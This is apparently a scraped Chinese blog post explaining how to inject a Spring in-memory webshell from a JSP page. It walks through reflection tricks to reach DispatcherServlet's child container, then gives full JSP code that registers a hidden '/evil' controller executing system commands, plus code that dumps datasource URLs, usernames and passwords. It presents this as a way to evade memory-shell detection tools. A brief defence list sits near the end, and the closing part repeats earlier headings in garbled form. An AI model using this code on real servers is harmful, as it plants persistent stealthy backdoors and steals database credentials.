在 JSP 中优雅注入 Spring 内存马技术详解<\/h1>

前言<\/h2>
随着内存马检测工具的不断完善，传统的内存马检测手段已经能够有效识别Servlet、Filter、Listener类型的内存马。本文介绍一种在JSP中注入Spring内存马的技术，该方法能够绕过当前主流的内存马检测工具。<\/p>

基础环境搭建<\/h2>

依赖配置(pom.xml)<\/h3>

<properties><\/span>
<\/span><\/span>    <spring.version><\/span>5.3.39<\/spring.version><\/span>
<\/span><\/span>    <tomcat.version><\/span>8.5.0<\/tomcat.version><\/span>
<\/span><\/span><\/properties><\/span>
<\/span><\/span>
<\/span><\/span><dependencies><\/span>
<\/span><\/span>    <!-- 核心依赖包括： --><\/span>
<\/span><\/span>    <!-- Tomcat相关库 --><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>org.apache.tomcat<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>tomcat-catalina<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>${tomcat.version}<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    
<\/span><\/span>    <!-- Spring核心库 --><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>org.springframework<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>spring-webmvc<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>${spring.version}<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    
<\/span><\/span>    <!-- 其他必要依赖... --><\/span>
<\/span><\/span><\/dependencies><\/span>
<\/span><\/span><\/code><\/pre>Web组件配置(web.xml)<\/h3>
<!-- 父容器配置 --><\/span>
<\/span><\/span><context-param><\/span>
<\/span><\/span>    <param-name><\/span>contextConfigLocation<\/param-name><\/span>
<\/span><\/span>    <param-value><\/span>classpath:spring-parent.xml<\/param-value><\/span>
<\/span><\/span><\/context-param><\/span>
<\/span><\/span><listener><\/span>
<\/span><\/span>    <listener-class><\/span>org.springframework.web.context.ContextLoaderListener<\/listener-class><\/span>
<\/span><\/span><\/listener><\/span>
<\/span><\/span>
<\/span><\/span><!-- 子容器配置 --><\/span>
<\/span><\/span><servlet><\/span>
<\/span><\/span>    <servlet-name><\/span>dispatcherServlet<\/servlet-name><\/span>
<\/span><\/span>    <servlet-class><\/span>org.springframework.web.servlet.DispatcherServlet<\/servlet-class><\/span>
<\/span><\/span>    <init-param><\/span>
<\/span><\/span>        <param-name><\/span>contextConfigLocation<\/param-name><\/span>
<\/span><\/span>        <param-value><\/span>classpath:spring-child.xml<\/param-value><\/span>
<\/span><\/span>    <\/init-param><\/span>
<\/span><\/span>    <load-on-startup><\/span>1<\/load-on-startup><\/span>
<\/span><\/span><\/servlet><\/span>
<\/span><\/span><\/code><\/pre>SpringMVC父子容器架构<\/h2>
核心概念<\/h3>


父容器(Root WebApplicationContext)<\/strong>:<\/p>

管理通用Bean(数据源、事务等)<\/li>
通过ContextLoaderListener初始化<\/li>
生命周期与Web应用一致<\/li>
<\/ul>
<\/li>

子容器(Child WebApplicationContext)<\/strong>:<\/p>

管理Servlet相关Bean(Controller、视图解析器等)<\/li>
通过DispatcherServlet初始化<\/li>
生命周期与对应Servlet一致<\/li>
<\/ul>
<\/li>
<\/ol>
关键特性<\/h3>

子容器可以访问父容器的Bean，反之则不行<\/li>
父子关系通过setParent()<\/code>方法建立<\/li>
父容器存储在ServletContext中(key为WebApplicationContext.ROOT_WEB_APPLICATION_CONTEXT_ATTRIBUTE<\/code>)<\/li>
子容器存储在Request域中(key为DispatcherServlet.WEB_APPLICATION_CONTEXT_ATTRIBUTE<\/code>)<\/li>
<\/ul>
传统IOC容器获取方式<\/h2>
获取父容器<\/h3>
\/\/ 方式1
<\/span><\/span><\/span><\/span>WebApplicationContext context1 =<\/span> ContextLoader.<\/span>getCurrentWebApplicationContext<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 方式2
<\/span><\/span><\/span><\/span>WebApplicationContext context2 =<\/span> WebApplicationContextUtils.<\/span>getWebApplicationContext<\/span>(<\/span>
<\/span><\/span>        servletContext);<\/span>
<\/span><\/span><\/code><\/pre>获取子容器<\/h3>
\/\/ 方式3
<\/span><\/span><\/span><\/span>WebApplicationContext context3 =<\/span> RequestContextUtils.<\/span>findWebApplicationContext<\/span>(<\/span>request);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 方式4
<\/span><\/span><\/span><\/span>WebApplicationContext context4 =<\/span> (<\/span>WebApplicationContext)<\/span> request.<\/span>getAttribute<\/span>(<\/span>
<\/span><\/span>        DispatcherServlet.<\/span>WEB_APPLICATION_CONTEXT_ATTRIBUTE<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>JSP中获取子容器的挑战与解决方案<\/h2>
问题分析<\/h3>
在JSP中无法直接获取子容器，因为：<\/p>

子容器存储在Request域中<\/li>
JSP执行时Request尚未经过DispatcherServlet处理<\/li>
<\/ol>
解决方案：反射获取DispatcherServlet<\/h3>


获取ServletContext<\/strong>:<\/p>
<%
ServletContext servletContext = request.getServletContext();
%>
<\/code><\/pre>
<\/li>

反射获取StandardContext<\/strong>:<\/p>
<%
Field context1 = servletContext.getClass().getDeclaredField("context");
context1.setAccessible(true);
ApplicationContext applicationContext = (ApplicationContext) context1.get(servletContext);

Field context2 = applicationContext.getClass().getDeclaredField("context");
context2.setAccessible(true);
StandardContext standardContext = (StandardContext) context2.get(applicationContext);
%>
<\/code><\/pre>
<\/li>

获取所有Servlet<\/strong>:<\/p>
<%
Field childrenField = Class.forName("org.apache.catalina.core.ContainerBase")
        .getDeclaredField("children");
childrenField.setAccessible(true);
HashMap<String, Container> children = (HashMap) childrenField.get(standardContext);
%>
<\/code><\/pre>
<\/li>

定位DispatcherServlet并获取子容器<\/strong>:<\/p>
<%
for (Map.Entry<String, Container> child : children.entrySet()) {
    Container standardWrapper = child.getValue();
    Field instance = standardWrapper.getClass().getDeclaredField("instance");
    instance.setAccessible(true);
    Object o = instance.get(standardWrapper);
    if (o instanceof DispatcherServlet) {
        ioc = (XmlWebApplicationContext) ((DispatcherServlet) o).getWebApplicationContext();
    }
}
%>
<\/code><\/pre>
<\/li>
<\/ol>
Spring内存马注入实现<\/h2>
完整JSP内存马代码<\/h3>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="java.util.Map" %>
<%@ page import="org.springframework.web.servlet.DispatcherServlet" %>
<%@ page import="org.springframework.web.context.support.XmlWebApplicationContext" %>
<%@ page import="org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping" %>
<%@ page import="org.springframework.web.servlet.mvc.method.RequestMappingInfo" %>
<%@ page import="org.springframework.web.servlet.mvc.condition.*" %>
<%@ page import="java.lang.reflect.Method" %>
<%!
public static class EvilController {
    public void evil() throws IOException {
        Runtime.getRuntime().exec("calc");
    }
}
%>
<%
\/\/ 获取IOC容器代码(如上所述)...

\/\/ 注入内存马
RequestMappingHandlerMapping mapping = ioc.getBean(RequestMappingHandlerMapping.class);
RequestMappingInfo info = new RequestMappingInfo(
        new PatternsRequestCondition("\/evil"),
        new RequestMethodsRequestCondition(),
        new ParamsRequestCondition(),
        new HeadersRequestCondition(),
        new ConsumesRequestCondition(),
        new ProducesRequestCondition(),
        new RequestConditionHolder(null));

Class<?> abstractMapping = Class.forName(
        "org.springframework.web.servlet.handler.AbstractHandlerMethodMapping");
Method registerMethod = abstractMapping.getDeclaredMethod(
        "registerHandlerMethod", Object.class, Method.class, Object.class);
registerMethod.setAccessible(true);

Method evilMethod = EvilController.class.getDeclaredMethod("evil");
registerMethod.invoke(mapping, new EvilController(), evilMethod, info);

out.println("内存马注入成功！访问\/evil执行命令");
%>
<\/code><\/pre>
扩展应用：无条件获取数据源配置<\/h2>
传统方法的局限性<\/h3>
传统方法依赖WebApplicationContextUtils.getWebApplicationContext()<\/code>，需要父容器支持。<\/p>
改进后的无条件获取方案<\/h3>
<%
\/\/ 先尝试从父容器获取
ApplicationContext ioc = WebApplicationContextUtils.getWebApplicationContext(
        pageContext.getServletContext());
List<DataSource> dataSources = getDataSources(ioc);

\/\/ 父容器获取失败则从子容器获取
if(ioc == null || dataSources == null || dataSources.isEmpty()) {
    \/\/ 使用反射获取子容器(如上所述)
    \/\/ ...
    dataSources = getDataSources(ioc);
}

\/\/ 读取数据源配置
for(DataSource ds : dataSources) {
    String className = ds.getClass().getName();
    if(className.equals("com.mchange.v2.c3p0.ComboPooledDataSource")) {
        Class clazz = Class.forName(className);
        String url = (String) clazz.getMethod("getJdbcUrl").invoke(ds);
        String user = (String) clazz.getMethod("getUser").invoke(ds);
        String pass = (String) clazz.getMethod("getPassword").invoke(ds);
        out.println("URL: " + url + "<br>User: " + user + "<br>Pass: " + pass);
    }
    \/\/ 其他数据源类型处理...
}
%>
<\/code><\/pre>
防御建议<\/h2>

禁用JSP执行权限<\/li>
监控不正常的RequestMapping注册<\/li>
检查DispatcherServlet等核心组件的反射调用<\/li>
实施严格的访问控制策略<\/li>
<\/ol>
总结<\/h2>
本文详细介绍了在JSP中注入Spring内存马的技术，关键点包括：<\/p>

SpringMVC父子容器架构的理解<\/li>
通过反射获取DispatcherServlet的技术<\/li>
在JSP环境中获取子容器的方法<\/li>
内存马注入的具体实现<\/li>
无条件获取数据源配置的扩展应用<\/li>
<\/ol>
这种技术能够绕过当前主流的内存马检测工具，具有较高的隐蔽性，同时也提醒我们需要加强对此类攻击的防护。<\/p>

在 JSP 中优雅注入 Spring 内存马技术详解<\/h1>

前言<\/h2> 随着内存马检测工具的不断完善，传统的内存马检测手段已经能够有效识别Servlet、Filter、Listener类型的内存马。本文介绍一种在JSP中注入Spring内存马的技术，该方法能够绕过当前主流的内存马检测工具。<\/p>

基础环境搭建<\/h2>

SpringMVC父子容器架构<\/h2>

传统IOC容器获取方式<\/h2>

JSP中获取子容器的挑战与解决方案<\/h2>

Spring内存马注入实现<\/h2>

扩展应用：无条件获取数据源配置<\/h2>

传统方法的局限性<\/h3> 传统方法依赖WebApplicationContextUtils.getWebApplicationContext()<\/code>，需要父容器支持。<\/p>

前言<\/h2>
随着内存马检测工具的不断完善，传统的内存马检测手段已经能够有效识别Servlet、Filter、Listener类型的内存马。本文介绍一种在JSP中注入Spring内存马的技术，该方法能够绕过当前主流的内存马检测工具。<\/p>

传统方法的局限性<\/h3>
传统方法依赖`WebApplicationContextUtils.getWebApplicationContext()<\/code>，需要父容器支持。<\/p>`